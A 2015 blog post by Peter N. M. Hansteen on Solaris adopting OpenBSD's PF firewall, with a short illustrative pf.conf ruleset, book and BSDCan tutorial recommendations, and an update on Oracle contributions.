If Oracle, or at least the Solaris parts of their distinctly non-diminutive organization, have started waking up to the fact that OpenBSD-originated software is high quality, secure stuff, we'll all be benefiting. Many of the world's largest corporations and government agencies are heavy Solaris users, meaning that even if you're neither an OpenBSD user nor a Solaris user, your kit is likely interacting intensely with both kinds. With Solaris moving to OpenBSD's PF for their filtering needs, we will all be benefiting even more from the OpenBSD project's emphasis on correctness, quality and security in the released OpenBSD code.

If you're a Solaris admin who's wondering what this all means to you, you can do several things to prepare for the future. One is to install OpenBSD somewhere (an LDOM in a spare corner of your T-series kit or an M-series domain will do, as will most kinds of x86ish kit) - preferably, also buying a CD set.
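Once you have an OpenBSD box to play on, it takes only a few lines to get a feel for PF's configuration syntax. The sketch below is purely illustrative (the interface name and allowed ports are made up for the example, not anything Oracle has announced for Solaris), but it shows the default-deny, stateful style a typical pf.conf is built around:

```
# Illustrative pf.conf sketch -- interface name and ports are example choices
ext_if = "em0"              # external interface; adjust to your hardware

set skip on lo              # never filter loopback traffic

block in all                # default deny for inbound traffic
pass out on $ext_if keep state   # allow outbound; state lets replies back in

# selectively allow inbound ssh and web traffic to this host
pass in on $ext_if proto tcp to ($ext_if) port { 22 80 443 } keep state
```

You would load and check a ruleset like this with `pfctl -nf /etc/pf.conf` (the `-n` flag parses without loading, handy while experimenting).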

A second possibly smart action (and I've been dying to say this for a while to Solaris folks) is to buy The Book of PF -- recently updated to cover new features such as the traffic shaping system.

And finally, if you're based in North America (or if your boss is willing to fly you to Ottawa in June anyway), there's a BSDCan tutorial session you probably want to take a closer look at, featuring yours truly. Similar sessions elsewhere may be announced later; watch the Upcoming talks section on the upper right. If you're thinking of going to Ottawa or my other sessions, you may want to take a peek at my notes on tutorials, originally written for two earlier BSDCan sessions.

Update 2015-04-15: Several commenters and correspondents have asked two related questions: "Will Oracle contribute code and patches back?" and "Will Oracle donate to OpenBSD?". The answer to the first question is that it looks like they've already started. Which is of course nice. Bugfixes and well implemented feature enhancements are welcome, as long as they come under an acceptable license. The answer to the second question is, we don't know yet. It probably won't hurt if the Oracle developers themselves as well as Solaris users start pointing the powers that be at Oracle in the direction of the OpenBSD project's Donations page, which outlines several useful approaches to help financing the project.

If you find this or other articles of mine useful, irritating, enlightening or otherwise and want me and the world to know about it, please use the comments feature. Response will likely be quicker there than if you send me email.

by Peter N. M. Hansteen ( at April 12, 2015 07:53 PM